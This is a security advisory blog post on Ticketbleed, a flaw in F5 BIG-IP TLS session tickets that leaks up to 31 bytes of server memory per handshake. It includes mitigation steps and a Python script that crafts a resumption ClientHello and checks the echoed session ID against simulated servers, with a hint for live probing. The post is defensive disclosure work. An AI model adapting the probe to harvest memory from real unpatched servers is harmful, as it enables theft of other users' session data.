Session Tickets option leaks uninitialised memory

By
Jijith Rajan
Published on
19 Jun 2018
1 min read
SSL

Ticketbleed (CVE-2016-9244) is a vulnerability in the session ticket implementation of the TLS stack in F5 BIG-IP appliances. It allows a remote, unauthenticated attacker to read up to 31 bytes of the server process's memory per handshake. Repeated over many connections, the leaked memory has been shown to contain other clients' session IDs and can in principle contain any other data the process holds, such as credentials or key material. When a client resumes a connection with a session ticket (RFC 5077), it also sends a session ID of its own choosing, between 1 and 32 bytes long, in its ClientHello; a server that accepts the ticket signals this by echoing exactly that session ID in its ServerHello. F5's implementation copied the client's session ID into a 32-byte buffer but always sent back all 32 bytes, regardless of how many bytes the client had supplied. A client that submits a 1-byte session ID therefore receives its own byte back followed by 31 bytes of uninitialised memory.

Ticketbleed is often compared to Heartbleed because both return unrelated process memory to the client. The difference is scale: Ticketbleed leaks at most 31 bytes per handshake, whereas a single Heartbleed request could return up to 64 KB.
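The exchange described above, as an added example that is not part of the original post or of F5's code: a Python script that builds the resumption ClientHello with a ticket and a short session ID, extracts the session ID echoed in the ServerHello, and simulates both a vulnerable server (which echoes all 32 bytes of its buffer) and a patched one. The ticket bytes and the "stale" buffer contents are constructed placeholders; against a real server the ticket would have to come from a prior full handshake and the ServerHello would be read from the socket.

```python
import os
import struct
from typing import Tuple

SESSION_TICKET_EXT = 0x0023  # session_ticket extension type (RFC 5077)

# Constructed placeholders: a real probe would use a ticket obtained from a
# prior full handshake with the target; the simulated servers below accept
# any ticket so that the session_id echo path can be shown offline.
FAKE_TICKET = b"\x00" * 48
# Constructed stand-in for whatever the server's 32-byte session_id buffer
# held before this connection (e.g. a previous client's session id).
STALE_MEMORY = b"prev-session-id-0123456789abcdef"


def _record(handshake_type: int, body: bytes) -> bytes:
    """Wrap a handshake body in a handshake header and a TLS record."""
    handshake = bytes([handshake_type]) + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def build_client_hello(session_id: bytes, ticket: bytes) -> bytes:
    """TLS 1.2 ClientHello that resumes with a ticket and a chosen session_id."""
    if not 1 <= len(session_id) <= 32:
        raise ValueError("session_id must be 1..32 bytes")
    # ECDHE-RSA-AES128-GCM-SHA256, AES128-GCM-SHA256, AES128-SHA
    cipher_suites = b"\xc0\x2f\x00\x9c\x00\x2f"
    ext = struct.pack("!HH", SESSION_TICKET_EXT, len(ticket)) + ticket
    body = (
        b"\x03\x03" + os.urandom(32)                       # version, client random
        + bytes([len(session_id)]) + session_id            # session_id<1..32>
        + struct.pack("!H", len(cipher_suites)) + cipher_suites
        + b"\x01\x00"                                      # one compression method: null
        + struct.pack("!H", len(ext)) + ext
    )
    return _record(0x01, body)


def build_server_hello(session_id: bytes) -> bytes:
    """TLS 1.2 ServerHello carrying session_id plus an empty session_ticket
    extension (the server announces it will send NewSessionTicket)."""
    ext = struct.pack("!HH", SESSION_TICKET_EXT, 0)
    body = (
        b"\x03\x03" + os.urandom(32)
        + bytes([len(session_id)]) + session_id
        + b"\xc0\x2f" + b"\x00"                            # chosen suite, null compression
        + struct.pack("!H", len(ext)) + ext
    )
    return _record(0x02, body)


def hello_session_id(record: bytes, handshake_type: int) -> bytes:
    """Extract session_id from a ClientHello (0x01) or ServerHello (0x02);
    both begin with version(2) + random(32) + session_id<0..32>."""
    if len(record) < 9 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != handshake_type:
        raise ValueError("unexpected handshake message type")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    if len(body) < 35:
        raise ValueError("truncated hello")
    sid_len = body[34]
    if sid_len > 32 or len(body) < 35 + sid_len:
        raise ValueError("bad session_id length")
    return body[35:35 + sid_len]


def vulnerable_server_hello(client_hello: bytes, stale: bytes = STALE_MEMORY) -> bytes:
    """Simulated faulty resumption path: the client's session_id is copied into
    a 32-byte buffer, but all 32 bytes of the buffer are always echoed back."""
    sid = hello_session_id(client_hello, 0x01)
    buf = bytearray(stale[:32].ljust(32, b"\x00"))
    buf[:len(sid)] = sid
    return build_server_hello(bytes(buf))


def patched_server_hello(client_hello: bytes, stale: bytes = STALE_MEMORY) -> bytes:
    """Correct behaviour: echo exactly the session_id the client sent."""
    return build_server_hello(hello_session_id(client_hello, 0x01))


def check_ticketbleed(sent_sid: bytes, server_hello: bytes) -> Tuple[bool, bytes]:
    """Client-side check. Returns (vulnerable, leaked_bytes).

    A correct server that accepts the ticket echoes sent_sid exactly; one that
    rejects it picks a fresh id that will not start with ours (use a probe of
    a few bytes so a chance match of the first byte is negligible). An echo
    that starts with sent_sid but is longer carries the leaked memory."""
    echoed = hello_session_id(server_hello, 0x02)
    if len(echoed) > len(sent_sid) and echoed.startswith(sent_sid):
        return True, echoed[len(sent_sid):]
    return False, b""


if __name__ == "__main__":
    sid = b"\x01"  # 1 byte sent, so a vulnerable server returns 31 leaked bytes
    hello = build_client_hello(sid, FAKE_TICKET)
    for name, server in (("vulnerable", vulnerable_server_hello),
                         ("patched", patched_server_hello)):
        vuln, leaked = check_ticketbleed(sid, server(hello))
        print(f"{name}: vulnerable={vuln}, leaked {len(leaked)} bytes: {leaked!r}")
```

Run as a script, the vulnerable path reports 31 leaked bytes for a 1-byte session ID and the patched path reports none. For a live probe, send a session ID of a few bytes rather than one so that a server which rejects the ticket and picks its own random ID cannot match by chance; the leak is then 32 minus the probe length.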

Impact

The impact includes:

  • Disclosure of server process memory to unauthenticated remote clients, 31 bytes per handshake. Collected across many connections, this can expose other users' session IDs and any other data the TLS process holds in memory.

Mitigation / Precaution

Beagle recommends the following fixes:

  • Disable the Session Ticket option on the affected client SSL profile (it is not enabled by default on BIG-IP). Resumed connections then fall back to server-side session caching, which adds a small cost when a resumed session is set up. Apply the fixed software version from F5 as well, since disabling tickets only works around the flaw.
  • For F5 users, the following steps disable session tickets:
    1. Log in to the Configuration utility.
    2. Navigate to Local Traffic → Profiles → SSL → Client and open the affected profile.
    3. Switch the Configuration setting from Basic to Advanced.
    4. Uncheck Session Ticket.
    5. Click Update.